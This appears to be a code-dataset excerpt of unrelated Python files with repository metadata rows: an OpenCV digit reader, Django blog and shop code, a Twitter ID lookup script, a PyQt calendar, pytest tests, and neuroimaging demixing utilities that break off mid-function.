cap = cv2.VideoCapture(0)
if cap.isOpened() == False:
    print('Unable to open the camera')
    exit()

# main loop: segment blue regions, find the smallest square-ish contour,
# mask out that ROI and run the KNN digit reader inside it.
while(True):
    # capture new frame
    ret, frame = cap.read()
    # convert BGR to HSV
    hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
    # ----- Tune these parameters so that blue-colour ------ #
    # ----- objects can be detected ------ #
    h_val_l = 80
    h_val_h = 120
    s_val_l = 100
    v_val_l = 100
    lower_blue = np.array([h_val_l,s_val_l, v_val_l])
    upper_blue = np.array([h_val_h, 255, 255])
    # ------------------------------------------------------- #
    # threshold the hsv image so that only the respective colour pixels are kept
    maskblue = cv2.inRange(hsv, lower_blue, upper_blue)
    # AND-bitwise operation between the mask and input images
    blue_object_img = cv2.bitwise_and(frame, frame, mask=maskblue)
    # visualise current frame
    cv2.imshow('frame',frame)
    # visualise mask image
    cv2.imshow('maskblue', maskblue)
    # visualise segmented blue object
    cv2.imshow('blue object', blue_object_img)
    ####### Use the mask to create roi #######
    blurred = cv2.GaussianBlur(maskblue,(3,3),0)
    #Detecting Edges
    edges = auto_canny(blurred)
    #Contour Detection & checking for squares based on the square area
    cntr_frame, contours, hierarchy = cv2.findContours(edges,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
    # Track the smallest 4-vertex contour seen this frame.
    smallerArea = 0
    smallerContours = 0
    for cnt in contours:
        approx = cv2.approxPolyDP(cnt,0.01*cv2.arcLength(cnt,True),True)
        if len(approx)==4:
            area = cv2.contourArea(approx)
            if smallerArea == 0:
                smallerArea = area
            if area <= smallerArea:
                smallerArea = area
                smallerContours = [approx]
    # Only accept candidates within a plausible on-screen size range.
    if smallerArea > 5000 and smallerArea < 15000:
        cv2.drawContours(frame,smallerContours,0,(0,0,255),2)
    cv2.imshow('Edges', edges)
    cv2.imshow('Square detection', frame)
    ###Create black image to use as mask
    img = np.zeros([480,640,1],dtype=np.uint8)
    if smallerContours != 0:
        # Flatten the 4 corner points and fill the (shrunk-by-5px) interior.
        roi = np.array(smallerContours)
        roi = roi.reshape(-1)
        img[roi[3]+5:roi[5]-5, roi[4]+5:roi[6]-5] = 255
        cv2.imshow('mask_image',img)
        img_num = cv2.bitwise_and(frame, frame, mask=img)
        cv2.imshow('cropped_image',img_num)
        im = img_num
        out = np.zeros(im.shape,np.uint8)
        gray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)
        thresh = cv2.adaptiveThreshold(gray,255,1,1,11,2)
        _,contours,hierarchy = cv2.findContours(thresh,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
        for cnt in contours:
            if cv2.contourArea(cnt)>50:
                # NOTE(review): this rebinds w and h, shadowing the global
                # frame dimensions (w=640, h=480) used by
                # four_point_transform — confirm this is harmless here.
                [x,y,w,h] = cv2.boundingRect(cnt)
                cuadrado = h - w
                # Keep only tall, digit-shaped boxes.
                if h > 28 and cuadrado > 10:
                    cv2.rectangle(im,(x,y),(x+w,y+h),(0,255,0),2)
                    roi = thresh[y:y+h,x:x+w]
                    roismall = cv2.resize(roi,(10,10))
                    roismall = roismall.reshape((1,100))
                    roismall = np.float32(roismall)
                    retval, results, neigh_resp, dists = model.findNearest(roismall, k = 1)
                    string = str(int((results[0][0])))
                    print (string)
                    cv2.putText(out,string,(x,y+h),0,1,(0,255,0))
        cv2.imshow('im',im)
        cv2.imshow('out',out)
        # NOTE(review): waitKey(0) blocks until a key is pressed every time
        # a ROI is found — confirm this pause is intentional.
        cv2.waitKey(0)
    # wait for the user to press 'q' to close the window
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break

# release VideoCapture object
cap.release()
# destroy windows to free memory
cv2.destroyAllWindows()
| [
"miguel_benavides95@hotmail.com"
] | miguel_benavides95@hotmail.com |
8fbbd1ed9759f1827fb7a1b942336e2661fddf29 | f9927d34e8eae617892ed553c66d6ed94844c4c5 | /myblog/blog/models.py | 7cf500da289b43672326384b2df6acbac9f419ab | [] | no_license | renxuwei/blog | 2524312122eee1b0024d2ea34bf1850d3ebb00ac | f5bb6074434540df39f24e650c9238035d14b799 | refs/heads/master | 2020-04-17T16:38:20.896305 | 2019-01-21T04:52:17 | 2019-01-21T04:52:17 | 166,749,058 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,987 | py | from django.db import models
# Create your models here.
class User(models.Model):
    """Minimal blog account record (separate from Django's auth user)."""
    username = models.CharField(max_length=10, unique=True)
    password = models.CharField(max_length=200)
    # NOTE(review): "crate_time" looks like a typo for "create_time" —
    # renaming would require a migration.
    crate_time = models.DateTimeField(auto_now_add=True)
    class Meta:
        db_table = 'user'
class Lanmus(models.Model):
    """Blog column/category ("lanmu"); supports a self-referential tree."""
    name = models.CharField(max_length=150, null=True)
    alias = models.CharField(max_length=150, null=True)  # alias
    fid = models.CharField(max_length=150, default='无')  # parent node id ('无' = none)
    keywords = models.CharField(max_length=100, default='无')  # keywords
    describe = models.TextField(null=True)  # description
    # Parent column; deleting a parent cascades to its children.
    lanmu = models.ForeignKey('self', on_delete=models.CASCADE,null=True)
    num = models.IntegerField(default=0)
    class Meta:
        db_table = 'lanmus'
class Article(models.Model):
    """A blog post with SEO fields, a column reference and an optional icon."""
    title = models.CharField(max_length=200, unique=True)
    neirong = models.TextField()                      # body content
    guanjianzi = models.CharField(max_length=200)     # keywords
    miaoshu = models.CharField(max_length=200)        # description
    # Column name stored as text in addition to the FK below.
    lanmu = models.CharField(max_length=10, null=False)
    biaoqian = models.CharField(max_length=500)       # tags
    icon = models.ImageField(upload_to='upload', null=True)
    jiami = models.IntegerField(default=1, null=False)  # encrypted/visibility flag
    time = models.DateTimeField(auto_now_add=True)
    move = models.CharField(max_length=10, null=False)
    lanmus = models.ForeignKey(Lanmus, on_delete=models.CASCADE,null=True)
    class Meta:
        db_table = 'article'
class Yonghu(models.Model):
    """Site user ("yonghu") with an optional avatar image."""
    name = models.CharField(max_length=10, unique=True, null=False)
    password = models.CharField(max_length=200, null=True)
    icon = models.ImageField(upload_to='upload', null=True)
    class Meta:
        db_table = 'yonghu'
# Home-page photo album
class Share(models.Model):
    """A shared photo entry displayed on the home page."""
    name = models.CharField(max_length=100, unique=True, null=False)
    icon = models.ImageField(upload_to='upload', null=True)
    content = models.TextField()
    class Meta:
        db_table = 'share'
| [
"937265565@qq.com"
] | 937265565@qq.com |
04a03c34ab0d348794edc2375303f110407cde99 | 3882ac93d41f66a40cd19f52559555bc01877b63 | /GetUserIds.py | 0b1b7c82546b696b5cb1ddb9d8dc72b65f2c6834 | [
"Unlicense"
] | permissive | usama124/TwitterDM | 1153ce64a51de3eece6b95490ffd738275ee9402 | f1726f225ff43805b38f49a7dc2a430ada180a4b | refs/heads/main | 2023-06-24T12:29:29.269716 | 2021-07-27T17:33:08 | 2021-07-27T17:33:08 | 389,982,712 | 0 | 0 | Unlicense | 2021-07-27T17:33:08 | 2021-07-27T12:54:07 | Python | UTF-8 | Python | false | false | 1,748 | py | import twitter, time
import configparser
# Module-level parser: every confParser() call reads from this one config.
parser = configparser.ConfigParser()
parser.read("Conf/config.ini")
def confParser(section):
    """Return the options of *section* as a dict of option name -> UTF-8 bytes.

    Prints a warning and returns None when the section is missing from the
    loaded config file.
    """
    if not parser.has_section(section):
        # Fixed message: was "No section info rmation are available ..."
        print("No section information is available in config file for", section)
        return None
    # Values are stored as bytes; callers decode("utf-8") what they need.
    return {str(option): value.encode("utf-8")
            for option, value in parser.items(section)}
def read_usernames():
    """Read one username per line from Data/usernames.txt.

    Returns the list of lines with trailing newlines stripped (blank
    lines become empty strings, as before).
    """
    # 'with' guarantees the file handle is closed even if reading fails;
    # the original leaked the handle on an exception.
    with open("Data/usernames.txt", "r", encoding="utf-8") as f:
        return [line.rstrip("\n") for line in f]
def write_userids(username_ids):
    """Write one 'username||user_id' line per mapping entry to Data/userids.txt."""
    # 'with' closes (and flushes) the file even if a write fails.
    with open("Data/userids.txt", "w") as f:
        for username, user_id in username_ids.items():
            f.write(username + "||" + user_id + "\n")
if __name__ == "__main__":
    # Build the Twitter API client from the [general_conf] config section.
    general_conf = confParser("general_conf")
    API_KEY = general_conf["api_key"].decode("utf-8")
    API_KEY_SECRETE = general_conf["api_key_secrete"].decode("utf-8")
    ACCESS_TOKEN = general_conf["access_token"].decode("utf-8")
    ACCESS_TOKEN_SECRETE = general_conf["access_token_secrete"].decode("utf-8")
    api = twitter.Api(consumer_key= API_KEY, consumer_secret = API_KEY_SECRETE, access_token_key = ACCESS_TOKEN, access_token_secret = ACCESS_TOKEN_SECRETE)
    usernames = read_usernames()
    username_ids = {}
    for username in usernames:
        try:
            # BUG FIX: look up each username from the list; the original
            # passed the hard-coded handle "DanishJanjua_" on every iteration.
            user_id = api.UsersLookup(screen_name=username)[0].id_str
            username_ids[username] = user_id
        except Exception:
            # Best-effort: skip handles that cannot be resolved.
            pass
        time.sleep(2)  # stay under Twitter API rate limits
    write_userids(username_ids)
| [
"utahir.itp@sparkcognition.com"
] | utahir.itp@sparkcognition.com |
500134f85ac7800ab444b6bc9db818f0dfcf9b70 | 0c95e9708a7811ef9a4f594154ffc53bbe1aa8ae | /Day1/__init__.py | 375ac6d65041cce7744015aaae12efe14850ac65 | [] | no_license | pearlzhou/smileGo | 4b0c5ba4f8581b13a0810e0198b000b583393867 | afec37ca9c5d52f40a195b2689aba99fcd9e9737 | refs/heads/master | 2020-04-27T16:49:48.094536 | 2019-03-08T08:05:35 | 2019-03-08T08:05:35 | 174,494,753 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 59 | py | #!/usr/bin/env python
#-*-coding:utf-8-*-
#author:zhouzz
| [
"1016102237@qq.com"
] | 1016102237@qq.com |
dcf3600aeeaf35be117fdbd9a43fbdc5eabfca39 | 55ddcae82338890a7101b2ff6db0856463702314 | /perfectcushion/shop/views.py | a4f89c9298be6f38dcdf99f21fba7c03c15909e5 | [] | no_license | rixinhaha/DjangoEcommerce | d31d6e8c7a4a40ba3f32d0e27ef203c59475c1dc | 0e3a188e8276bbfb63901747f553dd2ab483c284 | refs/heads/master | 2020-08-03T21:18:14.750498 | 2019-09-30T15:30:09 | 2019-09-30T15:30:09 | 211,887,708 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,652 | py | from django.shortcuts import render, get_object_or_404, redirect
from django.http import HttpResponse
from .models import Category,Product
from django.core.paginator import Paginator, EmptyPage, InvalidPage
from django.contrib.auth.models import Group, User
from .forms import SignUpForm
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import login, authenticate, logout
# Create your views here.
def index(request):
    """Render a plain-text placeholder page for the shop index."""
    greeting = 'This is my first django app web page'
    return HttpResponse(greeting)
def allProdCat(request, c_slug=None):
    """List available products, optionally filtered by category slug.

    Results are paginated six per page; an invalid or missing ?page value
    falls back to page 1, and an out-of-range page shows the last page.
    """
    c_page = None
    if c_slug != None:
        c_page = get_object_or_404(Category,slug=c_slug)
        products_list = Product.objects.filter(category = c_page, available=True)
    else:
        products_list = Product.objects.all().filter(available=True)
    paginator = Paginator(products_list, 6)
    try:
        page = int(request.GET.get('page', '1'))
    except (TypeError, ValueError):
        # Was a bare "except:"; narrowed so unrelated errors are not hidden.
        page = 1
    try:
        products = paginator.page(page)
    except (EmptyPage, InvalidPage):
        products = paginator.page(paginator.num_pages)
    return render(request, 'shop/category.html', {'category':c_page,'products':products})
def ProdCatDetail(request, c_slug, product_slug):
    """Render the detail page for one product identified by its category
    slug and its own slug."""
    try:
        product = Product.objects.get(category__slug=c_slug,slug=product_slug)
    except Exception:
        # Bare re-raise preserves the original traceback; "raise e"
        # pointlessly re-bound the exception.
        raise
    return render(request, 'shop/product.html', {'product':product})
def signupView(request):
    """Handle customer sign-up; new users are added to the "Customer" group."""
    if request.method == 'POST':
        form = SignUpForm(request.POST)
        if form.is_valid():
            form.save()
            username = form.cleaned_data.get('username')
            signup_user = User.objects.get(username=username)
            customer_group = Group.objects.get(name='Customer')
            customer_group.user_set.add(signup_user)
            # NOTE(review): no redirect after a successful signup — the
            # page re-renders with the bound form; confirm whether a
            # redirect (e.g. to sign-in) was intended.
    else:
        form = SignUpForm()
    return render(request, 'accounts/signup.html', {'form':form})
def signinView(request):
    """Authenticate a user and redirect to the product list on success."""
    if request.method == 'POST':
        form = AuthenticationForm(data=request.POST)
        if form.is_valid():
            username = request.POST['username']
            password = request.POST['password']
            user = authenticate(username=username, password=password)
            if user is not None:
                login(request, user)
                return redirect('shop:allProdCat')
            else:
                # NOTE(review): a failed authentication redirects to the
                # signup page; confirm this is the intended UX.
                return redirect('signup')
    else:
        form = AuthenticationForm()
    return render(request, 'accounts/signin.html', {'form':form})
def signoutView(request):
    """Log the current user out and redirect to the sign-in page."""
    logout(request)
    return redirect('signin')
"rixinhaha@gmail.com"
] | rixinhaha@gmail.com |
f7e66124cfb611cfdde05053e6b48a4ce7dff2fd | efd30b0ba0fd4d8c9e4ababe8113ba5be08319f2 | /parkings/migrations/0015_fill_normalized_reg_nums.py | 9f8b7a05457ba264cae61e627952374292b9a03d | [
"MIT"
] | permissive | City-of-Helsinki/parkkihubi | 3f559ef047592c5321b69c52474fc23a5eae0603 | 24751065d6e6cd68b89cd2a4358d51bdfc77cae6 | refs/heads/master | 2023-07-20T12:52:43.278380 | 2023-05-10T07:46:38 | 2023-05-10T07:46:38 | 75,084,288 | 14 | 15 | MIT | 2023-07-20T12:52:08 | 2016-11-29T13:32:13 | Python | UTF-8 | Python | false | false | 838 | py | from __future__ import unicode_literals
from django.db import migrations
from django.db.models import Q
from ..models import Parking
def fill_normalized_reg_nums(apps, schema_editor):
    """Data migration: backfill Parking.normalized_reg_num where empty.

    NOTE(review): Parking.normalize_reg_num is imported from the current
    models module rather than the historical (migration-state) model —
    confirm the helper stays stable across schema versions.
    """
    parking_model = apps.get_model('parkings', 'Parking')
    # Only rows whose normalized value is NULL or the empty string.
    parkings_to_process = parking_model.objects.filter(
        Q(normalized_reg_num=None) | Q(normalized_reg_num=''))
    for parking in parkings_to_process:
        parking.normalized_reg_num = Parking.normalize_reg_num(
            parking.registration_number)
        parking.save(update_fields=['normalized_reg_num'])
class Migration(migrations.Migration):
    # Runs after the column itself was added in migration 0014.
    dependencies = [
        ('parkings', '0014_normalized_reg_num'),
    ]

    operations = [
        # Backfill is one-way; reversing is a no-op so the migration can
        # still be unapplied cleanly.
        migrations.RunPython(
            code=fill_normalized_reg_nums,
            reverse_code=migrations.RunPython.noop),
    ]
| [
"tuomas.suutari@anders.fi"
] | tuomas.suutari@anders.fi |
feff0ed5afe6dbddcc2ff0f0b0c63b626abb8fe9 | 55bf44425b2c904e915ac8ac365dc293c1346b12 | /Personal Projects/Calendar/cal.py | 26eaa1876c0647a4e56a4b9a7715b18fdc9a0284 | [] | no_license | VincentiSean/Python-Practice | e88e73e6701a895004cf361595697ded9b9f362b | 7b3ba51ae8ecfde5caea7895b6dea425f0cbb94c | refs/heads/master | 2022-03-11T01:41:17.379799 | 2019-10-30T16:44:12 | 2019-10-30T16:44:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,834 | py | import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
import calendar
import datetime
# Column headers for the day grid (Monday-first).
weekdays = ["M", "Tu", "W", "Th", "F", "Sa", "Su"]
# Currently displayed month/year; set in initUI and mutated by the arrows.
currentMonth = 0
currentYear = 0
class Clndr(QMainWindow):
    """Main calendar window: draws the current month grid and lets the
    user step between months with the arrow buttons."""

    def __init__(self):
        QMainWindow.__init__(self)
        self.initUI()

    def initUI(self):
        """Build all widgets: month title, arrow buttons, weekday row and
        the day grid for the current month."""
        global weekdays
        global currentMonth
        global currentYear

        # Set global variables to current date
        currentDate = str(datetime.datetime.now()).split("-")
        currentYear = currentDate[0]
        currentMonth = currentDate[1]

        # Display current month on launch
        currMonthText = datetime.datetime.now().strftime("%B")
        currMonthLabel = QLabel(currMonthText, self)
        currMonthLabel.resize(1000, 75)
        currMonthLabel.move(0, 10)
        currMonthLabel.setAlignment(Qt.AlignCenter)
        monthFont = QFont("Times", 36, QFont.Bold)
        currMonthLabel.setFont(monthFont)

        # Set up left and right arrow buttons
        leftArrow = QPushButton("<", self)
        leftArrow.resize(50, 50)
        leftArrow.move(100, 25)
        leftArrow.clicked.connect(self.LeftArrow)

        rightArrow = QPushButton(">", self)
        rightArrow.resize(50, 50)
        rightArrow.move(860, 25)
        rightArrow.clicked.connect(self.RightArrow)

        # Set up weekday letters
        posX = 150
        for weekday in range(0, 7):
            weekdayLabel = QLabel(weekdays[weekday], self)
            weekdayLabel.resize(50, 20)
            weekdayLabel.setAlignment(Qt.AlignLeft)
            weekdayFont = QFont("Times", 12, QFont.Bold)
            weekdayLabel.setFont(weekdayFont)
            weekdayLabel.move(posX, 110)
            posX += 115

        # TODO: set up on a loop to update after arrow clicks?
        # Get current month/year for calendar
        nowDate = datetime.datetime.now()
        nowDate = str(nowDate).split("-")
        nowMonth = nowDate[1]
        nowYear = nowDate[0]

        # Get the current month's days with calendar module.
        # itermonthdays yields 0 for padding days outside the month.
        cal = calendar.Calendar()
        posX = 100
        posY = 135
        counter = 1
        for day in cal.itermonthdays(int(nowYear), int(nowMonth)):
            dayLabel = QLabel(self)
            dayLabel.resize(115, 100)
            dayLabel.move(2 + posX, posY)
            dayLabel.setStyleSheet("border: 1px solid grey;")
            dayLabel.setAlignment(Qt.AlignTop)
            if day == 0:
                dayLabel.setText("")
            else:
                dayLabel.setText(str(day))
            # Advance one cell; wrap to a new row every 7 cells.
            if counter < 7:
                posX += 115
            elif counter == 7:
                counter = 0
                posX = 100
                posY += 100
            counter += 1

        self.setGeometry(400, 200, 1000, 700)
        self.setWindowTitle("Calendar")
        self.setFixedSize(1000, 700)
        self.show()

    def _shift_month(self, delta):
        """Move the global currentMonth/currentYear by *delta* months
        (+1 or -1), wrapping across year boundaries.

        Shared helper: LeftArrow/RightArrow previously duplicated this
        logic. NOTE(review): the visible day grid is not redrawn after
        the change — only the globals are updated (see TODO in initUI).
        """
        global currentMonth
        global currentYear
        month = int(currentMonth) + delta
        year = int(currentYear)
        if month < 1:
            month = 12
            year -= 1
        elif month > 12:
            month = 1
            year += 1
        # Round-trip through a datetime to keep the zero-padded string
        # format ("05") the rest of the code expects.
        newDate = datetime.datetime(year, month, 1)
        currentMonth = str(newDate).split("-")[1]
        currentYear = str(newDate).split("-")[0]
        print(currentMonth)
        print(currentYear)

    def LeftArrow(self):
        """Handler for the '<' button: step one month back."""
        self._shift_month(-1)

    def RightArrow(self):
        """Handler for the '>' button: step one month forward."""
        self._shift_month(1)
def main():
    """Create the Qt application, show the calendar window and run the
    event loop until the window is closed."""
    app = QApplication(sys.argv)
    window = Clndr()
    window.show()
    sys.exit(app.exec_())


if __name__ == "__main__":
    main()
"noreply@github.com"
] | noreply@github.com |
4e9f69d87e835061a181778d25e5810c1fdb12f4 | dccf1fea8d62764b8c51259671f9b61d36196d41 | /quiz/tests/test_views.py | 3206b640c985d6489348d1011b7e9a68160df405 | [
"MIT"
] | permissive | Palombredun/django_quiz | e4594852c2709a9c6c58a96cc210f3f3dc1a282b | 1565d251d54dfb54fdee83096b560876833275a2 | refs/heads/master | 2021-07-08T23:11:23.157677 | 2021-01-13T14:26:31 | 2021-01-13T14:26:31 | 224,863,683 | 0 | 0 | null | 2019-11-29T13:53:50 | 2019-11-29T13:53:50 | null | UTF-8 | Python | false | false | 3,013 | py | import datetime
import pytest
from pytest_django.asserts import assertTemplateUsed
from django.contrib.auth.models import User
from quiz.models import Category, SubCategory, Quiz, Statistic, Question, Grade
### FIXTURE ###
@pytest.fixture
def user_A(db):
    """A plain user account used as quiz creator / logged-in client."""
    return User.objects.create_user(
        username="A", email="mail@mail.com", password="secret"
    )
@pytest.fixture
def category_m(db):
    """A bare Category named "m"."""
    return Category.objects.create(category="m")
@pytest.fixture
def sub_category_n(db, category_m):
    """A SubCategory "n" nested under category "m"."""
    return SubCategory.objects.create(category=category_m, sub_category="n")
@pytest.fixture
def quiz_q(db, category_m, sub_category_n, user_A):
    """A quiz created by user_A inside category m / subcategory n.

    The url slug "title-1" is what the take/statistics URL tests use.
    """
    date = datetime.datetime.now()
    return Quiz.objects.create(
        title="title",
        description="Long description",
        creator=user_A,
        category=category_m,
        category_name="m",
        sub_category=sub_category_n,
        created=date,
        random_order=False,
        difficulty=1,
        url="title-1"
    )
@pytest.fixture
def stats_s(db, quiz_q):
    """Aggregate statistics attached to quiz_q (one participant)."""
    return Statistic.objects.create(
        quiz=quiz_q,
        number_participants=1,
        mean=2,
        easy=1,
        medium=1,
        difficult=1
    )
@pytest.fixture
def grade_g(stats_s):
    """A single grade bucket (grade=2, count=1) linked to stats_s."""
    return Grade.objects.create(
        statistics=stats_s,
        grade=2,
        number=1
    )
### Tests page tutorial ###
def test_page_tutorial(client):
    """The tutorial page is reachable anonymously."""
    response = client.get("/quiz/tutorial/")
    assert response.status_code == 200
### Tests page create ###
def test_access_page_create_unlogged(client):
    """Anonymous access to quiz creation redirects (login required)."""
    response = client.get("/quiz/create/")
    assert response.status_code == 302
def test_access_page_create_logged(client, user_A):
    """A logged-in user can open the quiz creation page."""
    client.force_login(user_A)
    response = client.get("/quiz/create/")
    assert response.status_code == 200
### Test page load_sub_categories ###
def test_page_load_sub_categories(client, db):
    """The AJAX subcategory endpoint responds.

    NOTE(review): the URL has no leading slash — confirm the test client
    resolves this to the path actually routed by the app.
    """
    response = client.get("quiz/ajax/load-subcategories/")
    assert response.status_code == 200
### Test page quiz lists ###
def test_page_quiz_list(client, db):
    """The global quiz list renders even with no quizzes."""
    response = client.get("/quiz/quiz-list/")
    assert response.status_code == 200
def test_quiz_list_by_category(client, category_m):
    """The per-category quiz list renders for an existing category."""
    response = client.get("/quiz/category/m/")
    assert response.status_code == 200
def test_quiz_list_by_subcategory(client, sub_category_n):
    """The per-subcategory quiz list renders for an existing subcategory."""
    response = client.get("/quiz/subcategory/n/")
    assert response.status_code == 200
### Test page take ###
def test_take_quiz(client, quiz_q, user_A):
    """A logged-in user can open the "take quiz" page for an existing quiz."""
    client.force_login(user_A)
    url = "/quiz/take/" + quiz_q.url + "/"
    response = client.get(url)
    assert response.status_code == 200
### Test page statistics ###
def test_statistics(client, quiz_q, stats_s, user_A, grade_g):
    """The statistics page renders for a quiz with stats and one grade."""
    # A question must exist for the page to have data to aggregate;
    # the variable itself is unused on purpose.
    q = Question.objects.create(
        quiz=quiz_q,
        difficulty=1
    )
    client.force_login(user_A)
    url = "/quiz/statistics/" + quiz_q.url + "/"
    response = client.get(url)
    assert response.status_code == 200
| [
"baptiste.name"
] | baptiste.name |
3e78cd5beb2f40b2d302957a40cda8debb722657 | 84f8696f6f4c9f785615211fe1a746c3ac5b6996 | /fish_proc/utils/demix.py | aab6d2425221e6340e2ed4d005b33857aa250edf | [] | no_license | zqwei/fish_processing | 48a5494b92a2568bd6393685adfa465a6fe05cdb | 53251f4dc3698285873f7c58e4dd4cfaf030375a | refs/heads/master | 2021-09-21T06:51:35.874171 | 2021-08-16T19:39:34 | 2021-08-16T19:39:34 | 117,905,371 | 2 | 1 | null | 2021-08-16T19:39:34 | 2018-01-17T23:30:06 | Python | UTF-8 | Python | false | false | 9,382 | py | '''
A set of posthoc processing from demix algorithm
------------------------
Ziqiang Wei @ 2018
weiz@janelia.hhmi.org
'''
from ..demix.superpixel_analysis import *
import numpy as np
def pos_sig_correction(mov, axis_):
    """Shift *mov* so its minimum along *axis_* becomes zero (non-negative signal)."""
    baseline = mov.min(axis=axis_, keepdims=True)
    return mov - baseline
def recompute_C_matrix_sparse(sig, A):
    """Solve A @ C = sig with sparse linear algebra and return C densely.

    *sig* is a (d1, d2, T) movie; it is flattened to (d1*d2, T) in
    Fortran order before solving.
    """
    from scipy.sparse import csr_matrix
    from scipy.sparse.linalg import spsolve
    d1, d2, T = sig.shape
    flat_sig = csr_matrix(np.reshape(sig, (d1 * d2, T), order='F'))
    sparse_A = csr_matrix(A)
    solution = spsolve(sparse_A, flat_sig)
    return np.asarray(solution.todense())
def recompute_C_matrix(sig, A, issparse=False):
    """Least-squares recovery of temporal traces C from movie *sig* and
    spatial footprints *A* (one component per column).

    Uses the normal equations in the dense case and delegates to the
    sparse solver when issparse is True.
    """
    if issparse:
        return recompute_C_matrix_sparse(sig, A)
    d1, d2, T = sig.shape
    flat_sig = np.reshape(sig, (d1 * d2, T), order='F')
    gram_inv = np.linalg.inv(np.array(A.T.dot(A)))
    return gram_inv.dot(A.T.dot(flat_sig))
def recompute_nmf(rlt_, mov, comp_thres=0):
    """Recompute temporal components from a finished demixing result dict.

    Rebuilds the background (static b plus the optional fluctuating
    fb @ ff.T ranks), removes it from the positivity-corrected movie,
    re-solves for C with the surviving spatial components, and returns
    (C, background + mean residual, mean-subtracted residual movie).
    """
    b = rlt_['fin_rlt']['b']
    fb = rlt_['fin_rlt']['fb']
    ff = rlt_['fin_rlt']['ff']
    dims = mov.shape
    if fb is not None:
        # Add the fluctuating-background rank(s) on top of the static term.
        b_ = np.matmul(fb, ff.T)+b
    else:
        b_ = b
    mov_pos = pos_sig_correction(mov, -1)
    mov_no_background = mov_pos - b_.reshape((dims[0], dims[1], len(b_)//dims[0]//dims[1]), order='F')
    A = rlt_['fin_rlt']['a']
    # Drop spatial components whose support is at most comp_thres pixels.
    A = A[:, (A>0).sum(axis=0)>comp_thres]
    C_ = recompute_C_matrix(mov_no_background, A)
    mov_res = reconstruct(mov_pos, A, C_.T, b_, fb=fb, ff=ff)
    # Split the residual into its temporal mean and the fluctuating part.
    mov_res_ = mov_res.mean(axis=-1, keepdims=True)
    b_ = b_.reshape((dims[0], dims[1], len(b_)//dims[0]//dims[1]), order='F')
    return C_, b_+mov_res_, mov_res-mov_res_
def compute_res(mov_pos, rlt_):
    """Reconstruct the residual movie from a finished demixing result."""
    fin = rlt_['fin_rlt']
    return reconstruct(mov_pos, fin['a'], fin['c'], fin['b'],
                       fb=fin['fb'], ff=fin['ff'])
def demix_whole_data_snr(Yd, cut_off_point=[0.95,0.9], length_cut=[15,10],
                         th=[2,1], pass_num=1, residual_cut = [0.6,0.6],
                         corr_th_fix=0.31, max_allow_neuron_size=0.3,
                         merge_corr_thr=0.6, merge_overlap_thr=0.6, num_plane=1,
                         patch_size=[100,100], std_thres=0.5, plot_en=False, TF=False,
                         fudge_factor=1, text=True, bg=False, max_iter=35,
                         max_iter_fin=50, update_after=4):
    """
    This function is the demixing pipeline for whole data.
    For parameters and output, please refer to demix function (demixing pipeline for low rank data).

    SNR variant: pixels whose temporal std is below std_thres get white
    noise added before superpixel detection, so that near-constant pixels
    do not form spurious superpixels.
    NOTE(review): Yd is modified in place (min subtraction) and restored
    at the end — callers should not read Yd concurrently.
    """
    ## if data has negative values then do pixel-wise minimum subtraction ##
    Yd_min = Yd.min();
    # threshold data using its variability
    Y_amp = Yd.std(axis=-1)
    if Yd_min < 0:
        Yd_min_pw = Yd.min(axis=2, keepdims=True);
        Yd -= Yd_min_pw;
    dims = Yd.shape[:2];
    T = Yd.shape[2];
    superpixel_rlt = [];
    ## cut image into small parts to find pure superpixels ##
    patch_height = patch_size[0];
    patch_width = patch_size[1];
    height_num = int(np.ceil(dims[0]/patch_height)); ########### if need less data to find pure superpixel, change dims[0] here #################
    width_num = int(np.ceil(dims[1]/(patch_width*num_plane)));
    num_patch = height_num*width_num;
    patch_ref_mat = np.array(range(num_patch)).reshape(height_num, width_num, order="F");
    ii = 0;
    # Each pass finds superpixels on the (residual of the) movie, seeds
    # new components from pure superpixels, then runs the HALS-style update.
    while ii < pass_num:
        print("start " + str(ii+1) + " pass!");
        if ii > 0:
            # Later passes work on the residual of the previous pass.
            if bg:
                Yd_res = reconstruct(Yd, a, c, b, fb, ff);
            else:
                Yd_res = reconstruct(Yd, a, c, b);
            Yt = threshold_data(Yd_res, th=th[ii]);
        else:
            if th[ii] >= 0:
                Yt = threshold_data(Yd, th=th[ii]);
            else:
                Yt = Yd.copy();
        # Add noise to low-variability pixels so they do not correlate
        # spuriously during superpixel detection (SNR-specific step).
        Yt_ = Yt.copy()
        Yt_[Y_amp<std_thres] += np.random.normal(size=Yt.shape)[Y_amp<std_thres]
        start = time.time();
        if num_plane > 1:
            print("3d data!");
            connect_mat_1, idx, comps, permute_col = find_superpixel_3d(Yt_,num_plane,cut_off_point[ii],length_cut[ii],eight_neighbours=True);
        else:
            print("find superpixels!")
            connect_mat_1, idx, comps, permute_col = find_superpixel(Yt_,cut_off_point[ii],length_cut[ii],eight_neighbours=True);
        print("time: " + str(time.time()-start));
        start = time.time();
        print("rank 1 svd!")
        # Rank-1 SVD per superpixel gives initial spatial (a) and temporal
        # (c) estimates; the background ranks are only fit on pass 0.
        if ii > 0:
            c_ini, a_ini, _, _ = spatial_temporal_ini(Yt, comps, idx, length_cut[ii], bg=False);
        else:
            c_ini, a_ini, ff, fb = spatial_temporal_ini(Yt, comps, idx, length_cut[ii], bg=bg);
        #return ff
        print("time: " + str(time.time()-start));
        unique_pix = np.asarray(np.sort(np.unique(connect_mat_1)),dtype="int");
        unique_pix = unique_pix[np.nonzero(unique_pix)];
        #unique_pix = np.asarray(np.sort(np.unique(connect_mat_1))[1:]); #search_superpixel_in_range(connect_mat_1, permute_col, V_mat);
        brightness_rank_sup = order_superpixels(permute_col, unique_pix, a_ini, c_ini);
        #unique_pix = np.asarray(unique_pix);
        pure_pix = [];
        start = time.time();
        print("find pure superpixels!")
        # Successive-projection NMF on each spatial patch picks the
        # "pure" superpixels used to seed components.
        for kk in range(num_patch):
            pos = np.where(patch_ref_mat==kk);
            up=pos[0][0]*patch_height;
            down=min(up+patch_height, dims[0]);
